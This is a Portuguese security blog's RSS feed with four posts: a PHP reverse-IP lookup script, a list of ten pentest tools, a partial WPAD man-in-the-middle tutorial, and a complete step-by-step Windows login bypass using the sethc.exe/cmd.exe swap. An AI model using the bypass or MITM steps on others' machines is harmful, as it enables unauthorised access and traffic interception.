<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>INW-Segurança</title>
	<atom:link href="http://www.inw-seguranca.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.inw-seguranca.com</link>
	<description>Sua Participação nos Faz os Melhores</description>
	<lastBuildDate>Tue, 15 May 2012 19:23:43 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	
		<item>
		<title>[PHP] Reverse ip Script</title>
		<link>http://www.inw-seguranca.com/2012/05/15/php-reverse-ip-script/</link>
		<comments>http://www.inw-seguranca.com/2012/05/15/php-reverse-ip-script/#comments</comments>
		<pubDate>Tue, 15 May 2012 19:23:04 +0000</pubDate>
		<dc:creator>Samukt</dc:creator>
				<category><![CDATA[Pen-Test]]></category>
		<category><![CDATA[Programação]]></category>
		<category><![CDATA[IP]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[Reserve]]></category>

		<guid isPermaLink="false">http://www.inw-seguranca.com/?p=3243</guid>
		<description><![CDATA[Ola a todos, trago este script que recodei e reformulei de um amigo para reverse ip. Ele segue a mesma funcionalidade padrão de reverse lookups, basta inserir site ou ip no campo e continuar com Reverse para que sejam listados os sites correspondentes: Imagem 1: Imagem 2: Por vias das duvidas, comentei o código e]]></description>
			<content:encoded><![CDATA[<div id="HOTWordsTxt" name="HOTWordsTxt"><p>Ola a todos, trago este script que recodei e reformulei de um amigo para reverse ip.<br />
Ele segue a mesma funcionalidade padrão de reverse lookups, basta inserir site ou ip no campo e continuar com Reverse para que sejam listados os sites correspondentes:<br />
<span id="more-3243"></span><br />
Imagem 1:<br />
<img src="http://dl.dropbox.com/u/70633473/imagem1.bmp" alt="" border="0" /></p>
<p>Imagem 2:<br />
<img src="http://dl.dropbox.com/u/70633473/imagem2.bmp" alt="" border="0" /></p>
<p>Por vias das duvidas, comentei o código e logo abaixo o src completo:</p>
<pre class="brush: php; title: ;">
&lt;?php
// Guarda a variavel vindo de post do form html
$domain = $_POST['domain'];
// Se domain exister podemos continuar o trabalho.
if(! $_POST['domain']==&quot;&quot;){
// A variavel $reverse contem o site que iremos consultar no ato do reverse.
$reverse = &quot;http://networktools.nl/reverseip/&quot;;
// Dentro de add ficara nosso ip ou site do reverse
$add = $domain;
// $connect ficara concatenado o site junto com nosso dominio, ja que no site do reverse
// ao consultarmos determinado site fica:
// http://networktools.nl/reverseip/ipdosite
$connect = $reverse.$add;
// $title diz ao nosso código com expressão regular que, devemos pegar tudo entre as tags &lt;pre&gt;&lt;/pre&gt;
$title = '#&lt;pre&gt;(.*?)&lt;/pre&gt;#s';
// Variavel responsavel por guardar a execucação de curl, para facilitar as linhas do código.
$soket=curl_init();
// Mostrando ao curl qual url trabalhar.
curl_setopt($soket,CURLOPT_URL,$connect);
// Curl ira nos retornar o valor de $connect em string.
curl_setopt($soket,CURLOPT_RETURNTRANSFER,1);
// O valor de curl fica em $soket
curl_exec($soket);
// E por fim guardamos tudo dentro de uma variavel chamada $exec para execuçao
$exec=curl_exec($soket);
// Procure tudo de $title ('#&lt;pre&gt;(.*?)&lt;/pre&gt;#s') com o que foi guardado em $exec e mande para $yaz.
preg_match_all($title,$exec,$yaz);
// Mande o valor de [0] localizado em yaz, e transforme em $yazdir, ira ajudar nas linhas do código.
foreach($yaz[0] as $yazdir){
// Enquanto isso iremos gerar uma variavel que dentro dela ira conter instruçoes para substituirmos
// Strings especificas capturadas no sites no caso Encontre: 'Domains on' e troque por 'Sites no dominio'
$degis=ereg_replace(&quot;Domains on&quot;,&quot;Sites no dominio&quot;,$yazdir);
// Agora Basta imprimir na tela o resultado ja concatenado
echo &quot;&lt;center&gt;&lt;b&gt;&lt;span style='color: rgb(255, 255, 255);'&gt;$degis&lt;/span&gt;&lt;/b&gt;&lt;/center&gt;&quot;;
}
}
// Recoded e comentado por n4sss.
?&gt;
</pre>
<pre class="brush: php; title: ;">
&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD HTML 4.01 Transitional//EN&quot;&gt;
&lt;html&gt;
&lt;head&gt;
  &lt;title&gt;Reverse Lookup&lt;/title&gt;
&lt;/head&gt;
&lt;body
 style=&quot;background-color: rgb(45, 45, 45); color: rgb(0, 0, 0);&quot;
 alink=&quot;#ee0000&quot; link=&quot;#0000ee&quot; vlink=&quot;#551a8b&quot;&gt;
&lt;form method=&quot;post&quot; action=&quot;&quot;&gt;
  &lt;div
 style=&quot;font-family: monospace; color: rgb(255, 255, 255); font-weight: bold;&quot;
 align=&quot;center&quot;&gt;Reverse
ip Lookup recoded
by n4sss&lt;/div&gt;
  &lt;div align=&quot;center&quot;&gt;&lt;span
 style=&quot;font-family: monospace; color: rgb(255, 255, 255); font-weight: bold;&quot;&gt;Site/IP&lt;/span&gt;&lt;br&gt;
  &lt;input name=&quot;domain&quot; align=&quot;center&quot;
 type=&quot;text&quot;&gt;&lt;input
 value=&quot;Reverse!&quot; type=&quot;submit&quot;&gt;
  &lt;/div&gt;
&lt;/form&gt;
&lt;?php
// Guarda a variavel vindo de post do form html
$domain = $_POST['domain'];
// Se domain exister podemos continuar o trabalho.
if(! $_POST['domain']==&quot;&quot;){
// A variavel $reverse contem o site que iremos consultar no ato do reverse.
$reverse = &quot;http://networktools.nl/reverseip/&quot;;
// Dentro de add ficara nosso ip ou site do reverse
$add = $domain;
// $connect ficara concatenado o site junto com nosso dominio, ja que no site do reverse
// ao consultarmos determinado site fica:
// http://networktools.nl/reverseip/ipdosite
$connect = $reverse.$add;
// $title diz ao nosso código com expressão regular que, devemos pegar tudo entre as tags &lt;pre&gt;&lt;/pre&gt;
$title = '#&lt;pre&gt;(.*?)&lt;/pre&gt;#s';
// Variavel responsavel por guardar a execucação de curl, para facilitar as linhas do código.
$soket=curl_init();
// Mostrando ao curl qual url trabalhar.
curl_setopt($soket,CURLOPT_URL,$connect);
// Curl ira nos retornar o valor de $connect em string.
curl_setopt($soket,CURLOPT_RETURNTRANSFER,1);
// O valor de curl fica em $soket
curl_exec($soket);
// E por fim guardamos tudo dentro de uma variavel chamada $exec para execuçao
$exec=curl_exec($soket);
// Procure tudo de $title ('#&lt;pre&gt;(.*?)&lt;/pre&gt;#s') com o que foi guardado em $exec e mande para $yaz.
preg_match_all($title,$exec,$yaz);
// Mande o valor de [0] localizado em yaz, e transforme em $yazdir, ira ajudar nas linhas do código.
foreach($yaz[0] as $yazdir){
// Enquanto isso iremos gerar uma variavel que dentro dela ira conter instruçoes para substituirmos
// Strings especificas capturadas no sites no caso Encontre: 'Domains on' e troque por 'Sites no dominio'
$degis=ereg_replace(&quot;Domains on&quot;,&quot;Sites no dominio&quot;,$yazdir);
// Agora Basta imprimir na tela o resultado ja concatenado
echo &quot;&lt;center&gt;&lt;b&gt;&lt;span style='color: rgb(255, 255, 255);'&gt;$degis&lt;/span&gt;&lt;/b&gt;&lt;/center&gt;&quot;;
}
}
// Recoded e comentado por n4sss.
?&gt;
&lt;/body&gt;
&lt;/html&gt;
</pre>

<!-- Links Classifier - WordPress plugin -->
</div><center><script type="text/javascript"><!--
google_ad_client = "ca-pub-4528759947742278";
/* 468x60, criado 09/10/09 */
google_ad_slot = "8214544157";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></center>]]></content:encoded>
			<wfw:commentRss>http://www.inw-seguranca.com/2012/05/15/php-reverse-ip-script/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tutorial Burlar Senha do Windows 7 e XP</title>
		<link>http://www.inw-seguranca.com/2012/05/03/tutorial-burlar-senha-do-windows-7-e-xp/</link>
		<comments>http://www.inw-seguranca.com/2012/05/03/tutorial-burlar-senha-do-windows-7-e-xp/#comments</comments>
		<pubDate>Fri, 04 May 2012 01:44:17 +0000</pubDate>
		<dc:creator>Samukt</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[Senha]]></category>
		<category><![CDATA[Windows 7]]></category>
		<category><![CDATA[Windows Xp]]></category>

		<guid isPermaLink="false">http://www.inw-seguranca.com/?p=3239</guid>
		<description><![CDATA[Olá amigos do INW. Confira este tutorial de como burlar a senha de usuario do Windows 7 e XP. Tenha em mãos um CD de alguma distribuição Linux.De boot com o CD, selecione a opção &#8220;Experimentar Linux&#8221;, em seguida entre na pasta Windows/System32, renomeie este o arquivo &#8220;sethc.exe&#8221; para sethcOLD.EXE, em seguida copie o &#8220;cmd.exe&#8221;]]></description>
			<content:encoded><![CDATA[<div id="HOTWordsTxt" name="HOTWordsTxt"><p>Olá amigos do INW.<br />
Confira este tutorial de como burlar a senha de usuario do Windows 7 e XP.<br />
<span id="more-3239"></span><br />
Tenha em mãos um CD de alguma distribuição Linux.De boot com o CD, selecione a opção &#8220;Experimentar Linux&#8221;, em seguida entre na pasta Windows/System32, renomeie este o arquivo &#8220;sethc.exe&#8221; para sethcOLD.EXE, em seguida copie o &#8220;cmd.exe&#8221; e cole na Area de Trabalho do Linux, então renomeie o &#8220;cmd.exe&#8221; para sethc.exe e coloque na pasta System32.</p>
<p>Reinicie o computador dando boot no windows, ao aparacer a tela de login, pressione 5 vezes a tecla Shift esquerdo, vai aparecer o CMD, digite o comando: control userpasswords2.Ao executar esse comando vai aparecer a tela de gerenciamento de usuários, selecione o administrador e mude a senha.</p>
<p><strong>Autor: Tiagui99</strong></p>

<!-- Links Classifier - WordPress plugin -->
</div><center><script type="text/javascript"><!--
google_ad_client = "ca-pub-4528759947742278";
/* 468x60, criado 09/10/09 */
google_ad_slot = "8214544157";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></center>]]></content:encoded>
			<wfw:commentRss>http://www.inw-seguranca.com/2012/05/03/tutorial-burlar-senha-do-windows-7-e-xp/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[Top 10] Ferramentas Hacker Linux</title>
		<link>http://www.inw-seguranca.com/2012/04/25/top-10-ferramentas-hacker-linux/</link>
		<comments>http://www.inw-seguranca.com/2012/04/25/top-10-ferramentas-hacker-linux/#comments</comments>
		<pubDate>Thu, 26 Apr 2012 01:38:17 +0000</pubDate>
		<dc:creator>Samukt</dc:creator>
				<category><![CDATA[Pen-Test]]></category>

		<guid isPermaLink="false">http://www.inw-seguranca.com/?p=3235</guid>
		<description><![CDATA[Ola caros leitores, Confiram esta lista feita pelo nosso amigo N3ro! dos programas que não podem faltar no linux de quem está no ramo de sergurança da informação. &#62; 1. Nmap Nmap é um software livre que realiza port scan desenvolvido pelo Gordon Lyon, autoproclamado hacker &#8220;Fyodor&#8221;. É muito utilizado para avaliar a segurança dos]]></description>
			<content:encoded><![CDATA[<div id="HOTWordsTxt" name="HOTWordsTxt"><p>Ola caros leitores,<br />
Confiram esta lista feita pelo nosso amigo N3ro! dos programas que não podem faltar no linux de quem está no ramo de sergurança da informação.<br />
<span id="more-3235"></span><br />
<span style="font-size: small;"><span style="color: #006400;"><strong>&gt; 1. Nmap</strong></span></span></p>
<p>Nmap é um software livre que realiza port scan desenvolvido pelo Gordon Lyon, autoproclamado hacker &#8220;Fyodor&#8221;. É muito utilizado para avaliar a segurança dos computadores, e para descobrir serviços ou servidores em uma rede de computadores. Nmap é conhecido pela sua rapidez e pelas opções que dispõe. O Nmap é um programa CUI (Console User Interface), pelo que corre na linha de comandos, mas este tem uma interface gráfica (GUI), o NmapFE (Nmap Front End), que foi substituido pelo Zenmap em11 de Outubro de 2007, por ser uma versão portátil e prover uma interface melhor para execução e especialmente para visualização e análise dos resultados do Nmap.</p>
<p><span style="color: #006400;"><span style="font-size: x-small;"><strong>&gt; Links</strong></span></span></p>
<p>- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://pt.wikipedia.org/wiki/Nmap"  class="http external blank"  rel="nofollow" target="_blank">Wikipédia</a><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://nmap.org/"  class="http external blank"  rel="nofollow" target="_blank">Site Oficial</a><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://nmap.org/dist/nmap-5.51.tar.bz2"  class="http bz2 external blank"  rel="nofollow" target="_blank">Download</a> (Linux)</p>
<p><span style="color: #006400;"><span style="font-size: small;"><strong>&gt; 2. Aircrack</strong></span></span></p>
<p>Aircrack-ng é um detector de redes, sniffer de pacote, aplicativo de quebra de WEP e ferramenta de análise para redes locais sem fios802.11. Funciona com qualquer placa wireless cujo driver suporta modo de monitoramento bruto (para uma lista, visite o website do projeto) e pode capturar e analisar (sniff) tráfego 802.11a, 802.11b e 802.11g. O programa roda no Linux, Windows e no Sharp Zaurus.</p>
<p>Características:</p>
<p>I) aircrack-ng &#8211;&gt; Quebra chaves WEP e WPA and WPA (Busca por Força-bruta).<br />
II) airdecap-ng &#8211;&gt; Descriptografa arquivos capturados com criptograifa WEP ou WPA com a chave conhecida.<br />
III) airmon-ng &#8211;&gt; Coloca placas diferentes em modo monitor.<br />
IV) aireplay-ng &#8211;&gt; Injeção de pacotes (Somente em Linux).<br />
V) airodump-ng &#8211;&gt; Coloca tráfego do ar em um arquivo .cap e mostra informação das redes.<br />
VI) airtun-ng &#8211;&gt; É um criador de interface de túnel virtual.</p>
<p><span style="color: #006400;"><span style="font-size: x-small;"><strong>&gt; Links</strong></span></span></p>
<p>- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://pt.wikipedia.org/wiki/Aircrack-ng"  class="http external blank"  rel="nofollow" target="_blank">Wikipédia</a><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.aircrack-ng.org/"  class="http external blank"  rel="nofollow" target="_blank">Site Oficial</a><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz"  class="http gz external blank"  rel="nofollow" target="_blank">Download</a> (Linux)</p>
<p><span style="color: #006400;"><span style="font-size: small;"><strong>&gt; 3. Nessus </strong></span></span></p>
<p>Nessus é um programa de verificação de falhas/vulnerabilidades de segurança. Ele é composto por um cliente e servidor, sendo que o scan propriamente dito é feito pelo servidor. O nessusd (servidor Nessus) faz um port scan ao computador alvo, depois disso váriosscripts (escritos em NASL, Nessus Attack Scripting Language) ligam-se a cada porta aberta para verificar problemas de segurança. Estas falhas ou problemas podem ser descobertos por um grupo hacker, um único hacker, uma empresa de segurança ou pelo próprio fabricante, podendo ser de maneira acidental ou proposital, O Nessus ajuda a identificar e resolver estes problemas antes que alguém tire vantagem destes com propósitos maliciosos.</p>
<p><strong><span style="font-size: x-small;"><span style="color: #006400;">&gt; Links</span></span><br />
</strong><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://pt.wikipedia.org/wiki/Nessus"  class="http external blank"  rel="nofollow" target="_blank">Wikipédia</a><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.nessus.org/products/nessus"  class="http external blank"  rel="nofollow" target="_blank">Site Oficial</a><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://downloads.nessus.org/nessus3dl.php?file=Nessus-5.0.1-debian6_i386.deb&amp;licence_accept=yes&amp;t=0c4dbd0f07e7ba71dcb1ceb4cf42ec1d"  class="http external blank"  rel="nofollow" target="_blank">Download</a> (Linux)</p>
<p><span style="color: #006400;"><span style="font-size: small;"><strong>&gt; 4. Snort<br />
</strong></span></span><br />
Snort é um software livre de detecção de intrusão para rede (NIDS) desenvolvido inicialmente por Martin Roesch, capaz de desenvolver análise de tráfego em tempo real e registro depacote em redes IP. Executa análise de protocolo, busca/associa padrões de conteúdo e pode ser usado para detectar uma variedade de ataques, tais como buffer overflows, stealth port scans, ataques CGI, SMB probes, OS fingerprinting, entre outras.</p>
<p><span style="color: #006400;"><strong><span style="font-size: x-small;">&gt; Links<br />
</span></strong></span><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://pt.wikipedia.org/wiki/Snort"  class="http external blank"  rel="nofollow" target="_blank">Wikipédia</a><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.snort.org/"  class="http external blank"  rel="nofollow" target="_blank">Site Oficial</a><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.snort.org/downloads/1538"  class="http external blank"  rel="nofollow" target="_blank">Download</a> (Linux)</p>
<p><span style="color: #006400;"><span style="font-size: small;"><strong>&gt; 5. WireShark</strong></span></span></p>
<p>O Wireshark (anteriormente conhecido como Ethereal) é um programa que analisa o tráfego de rede, e o organiza porprotocolos. As funcionalidades do Wireshark são parecidas com o tcpdump mas com uma interface GUI, com mais informação e com a possibilidade da utilização de filtros. É então possível controlar o tráfego de uma rede e saber tudo o que entra e sai do computador, em diferentes protocolos, ou da rede à qual o computador está ligado.</p>
<p><strong><span style="font-size: x-small;"><span style="color: #006400;">&gt; Links</span><br />
</span></strong><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://pt.wikipedia.org/wiki/Wireshark"  class="http external blank"  rel="nofollow" target="_blank">Wikipédia</a><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.wireshark.org/"  class="http external blank"  rel="nofollow" target="_blank">Site Oficial</a><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://wiresharkdownloads.riverbed.com/wireshark/src/wireshark-1.6.7.tar.bz2"  class="http bz2 external blank"  rel="nofollow" target="_blank">Download</a> (Linux)</p>
<p><span style="color: #006400;"><span style="font-size: small;"><strong>&gt; 6. John the Ripper </strong></span></span></p>
<p>John the Ripper é um software para quebra de senhas. Inicialmente desenvolvido para sistemas unix-like, corre agora em vários sistemas operativos (como DOS, Windows, Linux,BSD). Disponível em versão livre e paga, o John the Ripper é capaz fazer força bruta em senhas cifradas em DES, MD4 e MD5 entre outras.</p>
<p>O John the Ripper possui quatro modos de operação:</p>
<p>I) Dicionário (Wordlist) &#8211;&gt; Sendo o modo mais simples suportado pelo programa, este é o conhecido ataque de dicionário, que lê as palavras de um arquivo e verifica se são correspondentes entre si.</p>
<p>II) Quebra Simples (Single Crack) &#8211;&gt; Mais indicado para início de uma quebra e mais rápido que o wordlist, este modo usa técnicas de mangling e mais informações do usuário pelo nome completo e diretório /home em combinação, para achar a senha mais rapidamente.</p>
<p>III) Incremental &#8211;&gt; Sendo o modo mais robusto no John the Ripper, ele tentará cada caractere possível até achar a senha correta, e por esse motivo é indicado o uso de parâmetros com o intuito de reduzir o tempo de quebra.</p>
<p>IV) Externo (External) &#8211;&gt; O modo mais complexo do programa que faz a quebra a partir de regras definidas em programação no arquivo de configuração do programa, que irá pré-processar as funções no arquivo no ato da quebra quando usar o programa na linha de comando e executá-las. Este modo é mais completo e necessita de tempo para aprender e acostumar-se.</p>
<p><span style="color: #006400;"><strong><span style="font-size: x-small;">&gt; Links<br />
</span></strong></span><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://pt.wikipedia.org/wiki/John_the_Ripper"  class="http external blank"  rel="nofollow" target="_blank">Wikipédia</a><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.openwall.com/john/"  class="http external blank"  rel="nofollow" target="_blank">Site Oficial</a><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.openwall.com/john/g/john-1.7.9.tar.gz"  class="http gz external blank"  rel="nofollow" target="_blank">Download</a> (Linux)</p>
<p><span style="color: #006400;"><span style="font-size: small;"><strong>&gt; 7. Kismet</strong></span></span></p>
<p>Kismet é um analisador de rede (sniffer), e um sistema de detecção de intrusão (IDS &#8211; Intrusion detection system) para redes 802.11wireless. Kismet pode trabalhar com as placas wireless no modo monitor, capturando pacotes em rede dos tipos: 802.11a, 802.11b e802.11g.</p>
<p>Recursos:</p>
<p>I) Quando ativado a placa de rede wireless fica em modo de monitoramento ou promíscuo, não permitindo ser usada para outros fins.<br />
II) Pode descobrir pontos de acessos configurados para não divulgar o ESSID devido a captura passiva no modo monitor.<br />
III) Pode descobrir qual o canal de rede mais congestionado.<br />
IV) <span style="color: #000000;">Permite integração com GPS.</span><br />
V) O arquivo de captura de pacotes é compatível com Wireshark e Aircrack-ng.</p>
<p><span style="color: #006400;"><strong><span style="font-size: x-small;">&gt; Links<br />
</span></strong></span><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://pt.wikipedia.org/wiki/Kismet"  class="http external blank"  rel="nofollow" target="_blank">Wikipédia</a><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.kismetwireless.net/"  class="http external blank"  rel="nofollow" target="_blank">Site Oficial</a><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.kismetwireless.net/code/kismet-2011-03-R2.tar.gz"  class="http gz external blank"  rel="nofollow" target="_blank">Download</a> (Linux)</p>
<p><span style="color: #006400;"><span style="font-size: small;"><strong>&gt; 8. Metasploit Framework<br />
</strong></span></span><br />
Metasploit Framework é uma avançada plataforma Open Source, concebida especificamente com o objetivo de reforçar e acelerar o desenvolvimento, ensaio e utilização de exploits. Para escolher um exploit e payload, algumas informações sobre o sistema de destino é necessária, como versão do sistema operacional e serviços de rede instalados. Esta informação pode ser adquirida com escaneamento de portas e OS fingerprinting ferramentas como o nmap . Scanners de vulnerabilidade, tais como NeXpose ou Nessus pode detectar o sistema alvo vulnerabilidades . Metasploit pode importar dados de varredura de vulnerabilidade e comparar as vulnerabilidades identificadas para os módulos de exploração existentes para a exploração precisa.</p>
<p><span style="color: #006400;"><strong><span style="font-size: x-small;">&gt; Links</span></strong></span></p>
<p>- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://en.wikipedia.org/wiki/Metasploit_Project"  class="http external blank"  rel="nofollow" target="_blank">Wikipédia</a> (EN) * <em>O Wikipédia BR deletou o página</em><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.metasploit.com/"  class="http external blank"  rel="nofollow" target="_blank">Site Oficial</a><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run"  class="http run external blank"  rel="nofollow" target="_blank">Download</a> (Linux)</p>
<p><span style="color: #006400;"><span style="font-size: small;"><strong>&gt; 9. Nikto</strong></span></span></p>
<p>Web Scanner Nikto é um Scanner de servidor Web que testa servidores Web para arquivos perigosos / CGIs, software de servidor desatualizado e outros problemas. Ele realiza verificações de tipo genéricos e específicos do servidor. Ela também captura e imprime os cookies recebidos. O código Nikto em si é Open Source (GPL), porém os arquivos de dados usados ​​para dirigi-lo não o são.</p>
<p><span style="color: #006400;"><strong><span style="font-size: x-small;">&gt; Links<br />
</span></strong></span><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://en.wikipedia.org/wiki/Nikto_Web_Scanner"  class="http external blank"  rel="nofollow" target="_blank">Wikipédia</a> (EN) * <em>O Wikipédia BR não possui informações</em><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.cirt.net/nikto2"  class="http external blank"  rel="nofollow" target="_blank">Site Oficial</a><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/https://cirt.net/nikto/nikto-2.1.4.tar.gz"  class="https gz external blank"  rel="nofollow" target="_blank">Download</a> (Linux)</p>
<p><span style="color: #006400;"><span style="font-size: small;"><strong>&gt; 10. Netcat</strong></span></span></p>
<p>O Netcat é uma ferramenta de rede, disponível para sistemas operacionais Unix, Linux, Microsoft Windows e Macintosh que permite, através de comandos e com sintaxe muito sensível, abrir portas TCP/UDP e HOST. Permite forçar conexões UDP/TCP (útil para realizar rastreamento de portas ou realizar transferências de arquivos bit a bit entre os equipamentos).</p>
<p><span style="color: #006400;"><strong><span style="font-size: x-small;">&gt; Links</span></strong></span></p>
<p>- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://pt.wikipedia.org/wiki/Netcat"  class="http external blank"  rel="nofollow" target="_blank">Wikipédia</a><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://netcat.sourceforge.net/"  class="http external blank"  rel="nofollow" target="_blank">Site Oficial</a><br />
- <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://internap.dl.sourceforge.net/sourceforge/netcat/netcat-0.7.1.tar.gz"  class="http gz external blank"  rel="nofollow" target="_blank">Download</a> (Linux)</p>
<p><span style="color: #006400;"><span style="font-size: small;"><strong>&gt; Alternativa para Download<br />
</strong></span></span><br />
I) Ubuntu: apt-get install nome do programa<br />
II) Fedora: yum install nome do programa<br />
III) Open Suse: yum install nome do programa<br />
IV) Debain: apt-get install nome do programa<br />
V) Gentoo: emerge -S nome do programa<br />
VI) Arch Linux: pacman -S nome do programa</p>
<p><span style="color: #006400;"><span style="font-size: small;"><strong>&gt; Considerações finais</strong></span></span></p>
<p>Gostaria de ressaltar que inicialmente vi um tópico semelhante a esse &#8220;em um blog&#8221;, mas o mesmo está super desorganizado e pouco intuitivo, então a partir dele tive a ideia de criar um com o mesmo assunto, porém mais organizado e fácil de entender, <span style="text-decoration: underline;">espero que gostem!</span><br />
<strong><br />
Autor: N3ro!</strong> ( <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.forum-invaders.com.br/vb/showthread.php/41047-Top-10-Ferramentas-Hacker-Linux"  class="http external self" >Postado no Forum Invaders </a>)</p>

<!-- Links Classifier - WordPress plugin -->
</div><center><script type="text/javascript"><!--
google_ad_client = "ca-pub-4528759947742278";
/* 468x60, criado 09/10/09 */
google_ad_slot = "8214544157";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></center>]]></content:encoded>
			<wfw:commentRss>http://www.inw-seguranca.com/2012/04/25/top-10-ferramentas-hacker-linux/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tutorial Sniffando dados (MITM) por falha em WPAD</title>
		<link>http://www.inw-seguranca.com/2012/04/18/tutorial-sniffando-dados-mitm-por-falha-em-wpad/</link>
		<comments>http://www.inw-seguranca.com/2012/04/18/tutorial-sniffando-dados-mitm-por-falha-em-wpad/#comments</comments>
		<pubDate>Thu, 19 Apr 2012 00:03:24 +0000</pubDate>
		<dc:creator>Samukt</dc:creator>
				<category><![CDATA[Pen-Test]]></category>
		<category><![CDATA[Sniffer]]></category>

		<guid isPermaLink="false">http://www.inw-seguranca.com/?p=3231</guid>
		<description><![CDATA[Mais uma tentativa da Microsoft em dominar o mundo que deu errado e até hoje traz prejuízo aos usuários do Rwindows. A ideia inicial era simplificar a configuração de proxies em grandes redes de computadores. A Micro$oft até tentou obrigar, no final da década de 90, o IETF (Internet Engineering Task Force) a tornar o]]></description>
			<content:encoded><![CDATA[<div id="HOTWordsTxt" name="HOTWordsTxt"><p>Mais uma tentativa da Microsoft em dominar o mundo que deu errado e até hoje traz prejuízo aos usuários do Rwindows.<br />
A ideia inicial era simplificar a configuração de proxies em grandes redes de computadores. A Micro$oft até tentou obrigar, no final da década de 90, o IETF (Internet Engineering Task Force) a tornar o protocolo padrão, mas não foi aprovado.<br />
Também pudera&#8230; Trata-se do WPAD (Web Proxy Auto Discovery). Você agora vai entender como funciona esse protocolo e ver como ele é frágil.</p>
<p><span id="more-3231"></span></p>
<p><strong>Como funciona?</strong><br />
Em um simples resumo, o WPAD serve pra detectar e configurar um servidor de proxy automaticamente.<br />
O WPAD, por padrão, já está ativo no browser quando ele está configurado para detectar as configurações de rede automaticamente. O Internet Explorer já vem com esta opção ativa.<br />
Quando você digita o endereço do website, o navegador verifica pela existência de um arquivo PAC (Proxy Auto Configuration), com sintaxe JavaScript. Este arquivo deve estar na raiz do servidor web (por exemplo, no diretório public_html) com o nome &#8216;wpad.dat&#8217; ou &#8216;proxy.pac&#8217;.<br />
Este arquivo indica as configurações de proxy melhores para acessar aquele servidor. A partir de então vai utilizar as configurações indicadas para setar o proxy. Veja um exemplo de arquivo PAC:<br />
Código:</p>
<pre class="brush: php; title: ;">
function FindProxyForURL(url, host) {
	return &quot;PROXY 192.168.1.1:3128&quot;;
}
</pre>
<p>Muito suspeito, não acha? Pois encerram-se as suspeitas e entram as evidências.</p>
<p><strong>Como é invadido?</strong><br />
Nossa missão é realizar um ataque man-in-the-middle (MITM), aproveitando da fragilidade oferecida no modo em que o WPAD procura pelo arquivo PAC no servidor. Tudo isso sem que o alvo fique sabendo, nem mesmo enganado por engenharia social.<br />
Vamos forjar este arquivo, configurando remotamente o navegador do usuário a usar nosso próprio proxy.<br />
Há mais de uma maneira de executar o MITM por este protocolo, mas hoje vamos ver apenas explorá-lo spoofando pacotes NetBIOS.<br />
Se você sniffar este protocolo, verá que há requisições broadcast (Endereço IP destinatário com final 255) NetBIOS, do tipo WPAD.<br />
